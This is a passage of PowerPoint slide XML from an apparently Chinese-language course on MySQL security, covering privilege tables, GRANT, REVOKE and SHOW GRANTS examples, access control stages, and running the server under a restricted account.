              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>Host</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>表中存储了摸个主机对数据库的操作权限，配合</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>权限表对给定主机上数据库级操作权限做更细致的控制，此表不受</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>GRANT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>REVOKE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>语句的影响</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>tables_priv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>表用来对表设置操作权限</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>columns_priv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>表用来对表的某一列设置权限</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>procs_priv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>表对存储过程和存储函数设置操作权限。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US"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用户权限表</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="96818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en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>Mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>权限管理主要是对登录到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>的用户进行权限验证。所有用户的权限都存储在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>的权限表中，不合理的权限规划会给</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>服务器带来安全隐患。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>数据库管理员要对所有用户的权限进行合理规划管理。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>Mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>权限系统的主要功能是证实连接到一台给定主机的用户，并且赋予该用户在数据库上的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>select</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>insert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>update</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>delete</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>的权限</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权限管理</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="370798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zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>授权是为某个用户授予权限，合理的授权可以保证数据库的安全</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>GRANT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>语句为用户授予权限</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>授予的权限可以分为多个层级：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>1.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>全局层级</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>2.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>数据库层级</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>3.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>表层级</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>4.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>列层级</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>5.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>子程序层级</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>示例：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>MYSQL&gt;GRANT SELECT,INSERT ON *.* TO ‘USER@LOCALHOST’IDENTIFIED BY ‘PWD’WITH GRANT OPTION;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US"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权限管理</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1276605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zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>收回权限就是取消已经赋予用户的某些权限。收回用户不必要的权限可以在一定程度上保证系统的安全性。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>示例：使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>revoke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>语句取消用户</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>test</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>的更新权限</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>Mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>&gt; REVOKE UPDATE ON ‘.’FROM ‘TEST@LOCALHOST’;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>show grants</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>语句查看指定用户的权限信息</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>SHOW GRANTS FOR ‘USER’@’HOST’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>示例：使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>show grants </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>语句查询用户</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>test</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>的权限信息</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>Mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>&gt;SHOW GRANTS FOR ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>test’@’localhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>’;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>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权限管理</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2076193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zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>下禁止使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>local system</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>来运行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>账户，可以考虑使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>network service</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>或者自己新建一个账号，但是必须给与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>程序所在目录的读取权限和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>目录的读取和写入权限； </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>下，新建一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>账号，并在安装的时候就指定</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>账户来运行，给与程序所在目录的读取权限，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>所在目录的读取和写入权限。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>运行账号需要给予程序所在目录的读取权限，以及</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>目录的读取和写入权限 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>不容许给予其他目录的写入和执行权限</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>取消</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>运行账户对于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>等一些程序的执行权限。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>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运行</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="88727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4464496"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>客户安全机制</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>数据库管理系统需要运行在某一特定的操作系统平台下，客户机操作系统的安全性直接影响到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>mssql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>的安全性。在用户使用客户计算机通过网络访问</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>mssql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>服务器时，用户首先要获得客户计算机操作系统的使用权限。保证操作系统的安全性是操作系统管理员或网络管理员的任务。由于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>mssql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>采用了集成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>Windows NT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>网络安全性机制，所以提高了操作系统的安全性，但与此同时也加大了管理数据库系统安全的难度。</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安全机制介绍</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3941122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marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>当</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>允许一个用户执行各种操作时，它将首先核实该用户向</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>服务器发送的连接请求，然后确认用户登录的操作请求是否被允许。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>Mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>访问控制分为两个阶段：连接核实阶段和请求核实阶段</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>连接核实阶段</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>当连接</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>服务器时，服务器基于用户的身份以及用户是否能通过正常的密码身份验证接受或拒绝连接。客户端用户连接请求时会提供用户名称、主机地址名和密码，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>表中的字段执行检查做字段匹配。如果整个连接核实没有通过，服务器完全拒绝访问；否则服务器接受连接，然后进入阶段</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>等待用户请求。</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访问控制</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3644011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zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>请求核实阶段</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访问控制</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
